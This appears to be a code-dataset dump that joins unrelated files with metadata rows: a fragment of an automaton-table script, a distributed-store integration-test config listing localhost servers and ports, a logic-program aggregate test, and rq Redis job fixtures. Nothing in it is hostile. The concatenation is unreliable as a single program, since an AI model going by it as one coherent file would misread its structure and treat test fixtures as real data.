[[23, 71]],
[
[1, 43],
[4, 4],
[9, 5],
[11, 72],
[17, 8],
[18, 9],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[13, 73]],
[[16, 74]],
[[39, 75]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 76],
[44, 20],
[45, 21],
[49, 22],
[51, 59],
[54, 25],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[80, 29],
],
[[40, 77]],
[[29, 78]],
[[32, 79]],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 12],
[27, 13],
[31, 80],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 81],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[[55, 82]],
[[56, 83]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 84],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[60, 27],
[61, 85],
[63, 29],
[65, 30],
[71, 50],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[79, 33],
[80, 29],
],
[[67, 86], [72, 25]],
[[61, 24], [63, 25]],
[[71, 20], [72, 21]],
[[25, 19], [27, 21]],
[[35, 87], [80, 21]],
[[71, 31], [80, 25]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 58],
[44, 20],
[45, 21],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[80, 29],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 59],
[54, 25],
[65, 30],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[80, 29],
],
[[61, 27], [79, 21]],
[
[1, 40],
[3, 3],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[77, 25],
[79, 33],
[80, 29],
],
[
[1, 88],
[3, 3],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[51, 41],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[5, 89], [9, 29]],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 90],
[27, 13],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[35, 8], [36, 9]],
[[21, 7], [27, 9]],
[[37, 91], [73, 33]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 92],
[44, 20],
[45, 21],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[80, 29],
],
[[31, 4], [36, 5]],
[[67, 30], [76, 5]],
[[31, 14], [76, 9]],
[
[11, 44],
[17, 8],
[18, 9],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[
[1, 43],
[4, 4],
[9, 5],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[57, 26], [75, 25]],
[[21, 11], [75, 5]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 55],
[43, 19],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 54],
[12, 7],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[78, 21],
[79, 33],
],
[[65, 93]],
[[17, 94]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[19, 10],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 95],
[43, 19],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
],
[[43, 96]],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[51, 41],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[59, 97]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 46],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 98],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[[39, 99]],
[[23, 100]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 101],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[59, 26],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[79, 33],
[80, 29],
],
[[29, 102]],
[[13, 103]],
[
[1, 2],
[3, 3],
[4, 4],
[9, 5],
[11, 104],
[12, 7],
[18, 9],
[19, 10],
[20, 11],
[21, 12],
[27, 13],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 55],
[43, 19],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[73, 9],
[74, 5],
[75, 17],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
],
[[57, 3], [63, 5]],
[[25, 10], [79, 9]],
[
[1, 43],
[4, 4],
[9, 5],
[11, 80],
[17, 8],
[18, 9],
[28, 14],
[31, 15],
[33, 16],
[36, 17],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[49, 22],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[73, 9],
[74, 5],
[76, 13],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
[[15, 16], [18, 17]],
[[47, 22], [74, 13]],
[
[11, 6],
[12, 7],
[17, 8],
[18, 9],
[20, 11],
[21, 12],
[27, 13],
[41, 18],
[43, 19],
[44, 20],
[45, 21],
[51, 23],
[52, 24],
[54, 25],
[59, 26],
[60, 27],
[61, 28],
[63, 29],
[65, 30],
[68, 31],
[71, 32],
[72, 33],
[74, 5],
[75, 17],
[77, 25],
[78, 21],
[79, 33],
[80, 29],
],
]
# Code written by me, and common for all data
reversed_state_labels = [0 for _ in names]
for i in range(1, len(names) + 1):
reversed_state_labels[names.index(state_labels[i])] = i
letters = {pair: index for (index, pair) in enumerate(product(names, names))}
transitions = []
transitions.append([0 for i in range(81)])
for index, row in enumerate(transitions_raw):
normalized_row = []
for letter in range(1, 81):
found = False
for pair in row:
if pair[0] == letter:
found = True
normalized_row.append(pair[1])
if not found:
normalized_row.append(0)
normalized_row.append(index + 1)
transitions.append(normalized_row)
if __name__ == "__main__":
# Print size of alphabet with padding symbol
print(len(names))
# Print alphabet
# print(" ".join(names))
# Print number of states
print(num_states)
# Print initial state
print(initial_state)
# Print number of accepting states
print(len(accepting_states_raw))
# Print mapping of labels to letters
print(" ".join(str(i) for i in reversed_state_labels))
# Print label of each state. A positive label is an accepting state.
print(" ".join("{0} {1}".format(i[0], i[1]) for i in accepting_states_raw))
# Print contents of transition matrix
for row in transitions:
print(" ".join(str(i) for i in row))
| 17.362464
| 79
| 0.238056
| 2,793
| 24,238
| 2.05299
| 0.066595
| 0.021625
| 0.029299
| 0.039065
| 0.731427
| 0.730729
| 0.72759
| 0.713987
| 0.711545
| 0.709801
| 0
| 0.412675
| 0.533212
| 24,238
| 1,395
| 80
| 17.37491
| 0.094131
| 0.01836
| 0
| 0.851095
| 0
| 0
| 0.002187
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00073
| 0
| 0.00073
| 0.005109
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
df420e353d6f53b3a9de3cb1044d797558fd000c
| 9,824
|
py
|
Python
|
integration_test/config.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 176
|
2015-12-30T08:44:30.000Z
|
2022-03-15T08:10:39.000Z
|
integration_test/config.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 35
|
2016-03-24T08:29:51.000Z
|
2021-12-09T20:06:39.000Z
|
integration_test/config.py
|
lynix94/nbase-arc
|
4de3c20ebd2f5ed13ab83dbc6a608f44e812ca78
|
[
"Apache-2.0"
] | 65
|
2015-12-30T09:05:13.000Z
|
2022-03-15T08:10:43.000Z
|
#
# Copyright 2015 Naver Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# export PATH=$ZOOKEEPER_HOME/bin:$PATH
import os
import sys
opt_use_memlog = os.path.exists("/tmp/opt_use_memlog")
sudoer = os.getenv("NBASE_ARC_TEST_SUDOER")
zookeeper_info = [
{'id':0, 'bin_dir':'$HOME/bin/zk1/bin'},
{'id':1, 'bin_dir':'$HOME/bin/zk2/bin'},
{'id':2, 'bin_dir':'$HOME/bin/zk3/bin'},
]
machines = [
{
'name' : 'localhost',
'ip' : '127.0.0.1',
'type' : 'real',
},
{
'name' : 'virtual_localhost',
'ip' : '127.0.0.1',
'virtual_ip' : '127.0.0.100',
'type' : 'virtual',
},
{
'name' : 'virtual_localhost1',
'ip' : '127.0.0.1',
'virtual_ip' : '127.0.0.101',
'type' : 'virtual',
},
{
'name' : 'vm2',
'ip' : '127.0.0.1',
'virtual_ip' : '127.0.0.101',
'type' : 'virtual',
},
{
'name' : 'vm3',
'ip' : '127.0.0.1',
'virtual_ip' : '127.0.0.102',
'type' : 'virtual',
}
]
server1 = {
'id' : 0,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1122,
'pg_id' : 0,
'smr_base_port' : 8100,
'smr_mgmt_port' : 8103,
'gateway_port' : 8200,
'gateway_mgmt_port' : 8201,
'redis_port' : 8109,
'zk_port' : 2181,
}
server2 = {
'id' : 1,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1123,
'pg_id' : 0,
'smr_base_port' : 9100,
'smr_mgmt_port' : 9103,
'gateway_port' : 9200,
'gateway_mgmt_port' : 9201,
'redis_port' : 9109,
'zk_port' : 2181,
}
server3 = {
'id' : 2,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1124,
'pg_id' : 0,
'smr_base_port' : 10100,
'smr_mgmt_port' : 10103,
'gateway_port' : 10200,
'gateway_mgmt_port' : 10201,
'redis_port' : 10109,
'zk_port' : 2181,
}
server4 = {
'id' : 3,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1125,
'pg_id' : 1,
'smr_base_port' : 8110,
'smr_mgmt_port' : 8113,
'gateway_port' : 8210,
'gateway_mgmt_port' : 8211,
'redis_port' : 8119,
'zk_port' : 2181,
}
server40 = {
'id' : 3,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1125,
'pg_id' : 0,
'smr_base_port' : 8110,
'smr_mgmt_port' : 8113,
'gateway_port' : 8210,
'gateway_mgmt_port' : 8211,
'redis_port' : 8119,
'zk_port' : 2181,
}
server5 = {
'id' : 4,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1126,
'pg_id' : 1,
'smr_base_port' : 9110,
'smr_mgmt_port' : 9113,
'gateway_port' : 9210,
'gateway_mgmt_port' : 9211,
'redis_port' : 9119,
'zk_port' : 2181,
}
server6 = {
'id' : 5,
'cluster_name' : 'testCluster0',
'ip' : '127.0.0.1',
'pm_name' : 'localhost',
'cm_port' : 1127,
'pg_id' : 1,
'smr_base_port' : 10110,
'smr_mgmt_port' : 10113,
'gateway_port' : 10210,
'gateway_mgmt_port' : 10211,
'redis_port' : 10119,
'zk_port' : 2181,
}
virtual_server1 = {
'id' : 0,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1122,
'pg_id' : 0,
'smr_base_port' : 8100,
'smr_mgmt_port' : 8103,
'gateway_port' : 8200,
'gateway_mgmt_port' : 8201,
'redis_port' : 8109,
'zk_port' : 2181,
}
virtual_server2 = {
'id' : 1,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1123,
'pg_id' : 0,
'smr_base_port' : 9100,
'smr_mgmt_port' : 9103,
'gateway_port' : 9200,
'gateway_mgmt_port' : 9201,
'redis_port' : 9109,
'zk_port' : 2181,
}
virtual_server21 = {
'id' : 1,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1123,
'pg_id' : 1,
'smr_base_port' : 9100,
'smr_mgmt_port' : 9103,
'gateway_port' : 9200,
'gateway_mgmt_port' : 9201,
'redis_port' : 9109,
'zk_port' : 2181,
}
virtual_server3 = {
'id' : 2,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1124,
'pg_id' : 0,
'smr_base_port' : 10100,
'smr_mgmt_port' : 10103,
'gateway_port' : 10200,
'gateway_mgmt_port' : 10201,
'redis_port' : 10109,
'zk_port' : 2181,
}
virtual_server4 = {
'id' : 3,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.101',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost1',
'cm_port' : 1125,
'pg_id' : 1,
'smr_base_port' : 8110,
'smr_mgmt_port' : 8113,
'gateway_port' : 8210,
'gateway_mgmt_port' : 8211,
'redis_port' : 8119,
'zk_port' : 2181,
}
virtual_server5 = {
'id' : 4,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.101',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost1',
'cm_port' : 1126,
'pg_id' : 1,
'smr_base_port' : 9110,
'smr_mgmt_port' : 9113,
'gateway_port' : 9210,
'gateway_mgmt_port' : 9211,
'redis_port' : 9119,
'zk_port' : 2181,
}
virtual_server6 = {
'id' : 5,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.101',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost1',
'cm_port' : 1127,
'pg_id' : 1,
'smr_base_port' : 10110,
'smr_mgmt_port' : 10113,
'gateway_port' : 10210,
'gateway_mgmt_port' : 10211,
'redis_port' : 10119,
'zk_port' : 2181,
}
vm1 = {
'id' : 0,
'cluster_name' : 'no_opinion',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1122,
'pg_id' : 0,
'smr_base_port' : 8100,
'smr_mgmt_port' : 8103,
'gateway_port' : 8200,
'gateway_mgmt_port' : 8201,
'redis_port' : 8109,
'zk_port' : 2181,
}
vm2 = {
'id' : 1,
'cluster_name' : 'no_opinion',
'ip' : '127.0.0.101',
'real_ip' : '127.0.0.1',
'pm_name' : 'vm2',
'cm_port' : 1123,
'pg_id' : 0,
'smr_base_port' : 9100,
'smr_mgmt_port' : 9103,
'gateway_port' : 9200,
'gateway_mgmt_port' : 9201,
'redis_port' : 9109,
'zk_port' : 2181,
}
vm3 = {
'id' : 2,
'cluster_name' : 'no_opinion',
'ip' : '127.0.0.102',
'real_ip' : '127.0.0.1',
'pm_name' : 'vm3',
'cm_port' : 1124,
'pg_id' : 0,
'smr_base_port' : 10100,
'smr_mgmt_port' : 10103,
'gateway_port' : 10200,
'gateway_mgmt_port' : 10201,
'redis_port' : 10109,
'zk_port' : 2181,
}
clusters = [
# 0
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,8191],
'pg_id_list' : [0],
'servers' : [server1, server2, server3]
},
# 1
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,8191, -1, -1],
'pg_id_list' : [0, 1],
'servers' : [server1, server2, server3, server4, server5, server6]
},
# 2
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,4095,4096,8191],
'pg_id_list' : [0, 1],
'servers' : [server1, server2, server3, server4, server5, server6]
},
# 3
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,8191],
'pg_id_list' : [0],
'servers' : [server1, server2]
},
# 4
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,8191, -1, -1],
'pg_id_list' : [0, 1],
'servers' : [server1, server2, server3, server4, server5, server6]
},
# 5
{
'cluster_name' : 'network_isolation_cluster_1',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,4095,4096,8191],
'pg_id_list' : [0, 1],
'servers' : [virtual_server1, virtual_server2, virtual_server3, server4, server5, server6]
},
# 6
{
'cluster_name' : 'network_isolation_cluster_2',
'keyspace_size' : 8192,
'quorum_policy' : '0:1:2',
'slots' : [0,8191],
'pg_id_list' : [0],
'servers' : [virtual_server1, server2, virtual_server3]
},
# 7
{
'cluster_name' : 'network_isolation_cluster_1_2copy',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,4095,4096,8191],
'pg_id_list' : [0, 1],
'servers' : [server40, virtual_server1, server5, virtual_server21]
},
# 8
{
'cluster_name' : 'no_opinion',
'keyspace_size' : 8192,
'quorum_policy' : '0:1:2',
'slots' : [0,8191],
'pg_id_list' : [0],
'servers' : [vm1, vm2, vm3]
},
# 9
{
'cluster_name' : 'network_isolation_cluster_3',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,4095,4096,8191],
'pg_id_list' : [0, 1],
'servers' : [virtual_server1, virtual_server2, virtual_server3, virtual_server4, virtual_server5, virtual_server6]
},
]
def verify_config():
print "### Verify config ###"
if opt_use_memlog == None:
print " Invalid opt_use_memlog."
sys.exit(-1)
else:
print " opt_use_memlog : %s" % opt_use_memlog
if sudoer == None:
print " Invalid sudoer. Check environmental variable, NBASE_ARC_TEST_SUDOER."
sys.exit(-1)
else:
print " sudoer : %s" % sudoer
| 22.026906
| 118
| 0.586726
| 1,336
| 9,824
| 4.037425
| 0.146707
| 0.01409
| 0.040044
| 0.046719
| 0.784205
| 0.746385
| 0.721542
| 0.721542
| 0.705784
| 0.705784
| 0
| 0.138725
| 0.222211
| 9,824
| 445
| 119
| 22.076404
| 0.567203
| 0.061686
| 0
| 0.719895
| 0
| 0
| 0.434773
| 0.036122
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.005236
| null | null | 0.013089
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df65232810db56406272fa6f57032245bce79337
| 369
|
py
|
Python
|
tests/parser/aggregates.sum.assignment.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.sum.assignment.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.sum.assignment.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a(S,T,Z) :- #sum{X: r(T,X)} = Z, #sum{W: p(W,Y)} = S, #sum{K: q(K,S)} = T.
q(1,3).
q(2,4).
r(1,1).
r(1,2).
r(1,3).
r(2,2).
r(3,3).
p(1,1).
p(2,2).
%{out a(3,1,6).
"""
output = """
a(S,T,Z) :- #sum{X: r(T,X)} = Z, #sum{W: p(W,Y)} = S, #sum{K: q(K,S)} = T.
q(1,3).
q(2,4).
r(1,1).
r(1,2).
r(1,3).
r(2,2).
r(3,3).
p(1,1).
p(2,2).
%{out a(3,1,6).
"""
| 10.542857
| 74
| 0.365854
| 110
| 369
| 1.227273
| 0.181818
| 0.088889
| 0.044444
| 0.059259
| 0.918519
| 0.918519
| 0.918519
| 0.918519
| 0.918519
| 0.918519
| 0
| 0.139535
| 0.184282
| 369
| 34
| 75
| 10.852941
| 0.30897
| 0
| 0
| 0.923077
| 0
| 0.076923
| 0.915989
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
df7c9781349cd9528abcd5047e26bf4014fade55
| 33,579
|
py
|
Python
|
tests/fixtures/rq_1_0.py
|
FlorianPerucki/rq-dashboard
|
81492879f68cb4dadc7dc4685b44d2e3e36c6343
|
[
"BSD-2-Clause-FreeBSD"
] | 436
|
2016-11-30T01:02:35.000Z
|
2019-10-02T06:09:39.000Z
|
tests/fixtures/rq_1_0.py
|
FlorianPerucki/rq-dashboard
|
81492879f68cb4dadc7dc4685b44d2e3e36c6343
|
[
"BSD-2-Clause-FreeBSD"
] | 144
|
2019-10-02T12:20:01.000Z
|
2022-03-30T20:32:03.000Z
|
tests/fixtures/rq_1_0.py
|
FlorianPerucki/rq-dashboard
|
81492879f68cb4dadc7dc4685b44d2e3e36c6343
|
[
"BSD-2-Clause-FreeBSD"
] | 103
|
2016-12-02T05:43:06.000Z
|
2019-09-27T15:05:10.000Z
|
fxt_ready = [
(b'rq:job:bcb5774c-24c6-4d99-a45d-cf9c9d560571', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.606034Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.605756Z\x08\x00\x823]\xe9\xcd\\\x0c\x85'),
(b'rq:job:0b8e247a-81f6-4de2-8fde-080a2518b5bc', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.323981Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.323621Z\x08\x00]tp\xcc\xb3\xd0<\x13'),
